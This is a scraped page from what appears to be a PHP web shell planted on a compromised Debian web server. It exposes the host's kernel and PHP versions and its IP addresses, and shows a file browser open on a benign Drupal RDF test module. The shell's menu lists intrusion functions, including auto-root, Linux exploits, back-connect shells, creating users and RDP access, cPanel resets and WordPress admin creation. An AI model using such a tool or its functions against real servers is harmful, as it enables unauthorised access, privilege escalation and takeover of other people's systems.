Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.137.186.186
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
rdf /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
rdf_test.info
270
B
-rw-r--r--
rdf_test.install
472
B
-rw-r--r--
rdf_test.module
1.55
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rdf_test.module
<?php /** * @file * Test API interaction with the RDF module. */ /** * Implements hook_rdf_mapping(). */ function rdf_test_rdf_mapping() { return array( array( 'type' => 'test_entity', 'bundle' => 'test_bundle', 'mapping' => array( 'rdftype' => array('sioc:Post'), 'title' => array( 'predicates' => array('dc:title'), ), 'created' => array( 'predicates' => array('dc:created'), 'datatype' => 'xsd:dateTime', 'callback' => 'date_iso8601', ), 'uid' => array( 'predicates' => array('sioc:has_creator', 'dc:creator'), 'type' => 'rel', ), 'foobar' => array( 'predicates' => array('foo:bar'), ), 'foobar1' => array( 'datatype' => 'foo:bar1type', 'predicates' => array('foo:bar1'), ), 'foobar_objproperty1' => array( 'predicates' => array('sioc:has_creator', 'dc:creator'), 'type' => 'rel', ), 'foobar_objproperty2' => array( 'predicates' => array('sioc:reply_of'), 'type' => 'rev', ), ), ), array( 'type' => 'node', 'bundle' => 'blog', 'mapping' => array( 'rdftype' => array('sioct:Weblog'), ), ), ); } /** * Implements hook_rdf_namespaces(). */ function rdf_test_rdf_namespaces() { return array( 'dc' => 'http://purl.org/conflicting/namespace', 'foaf' => 'http://xmlns.com/foaf/0.1/', 'foaf1' => 'http://xmlns.com/foaf/0.1/', ); }
Close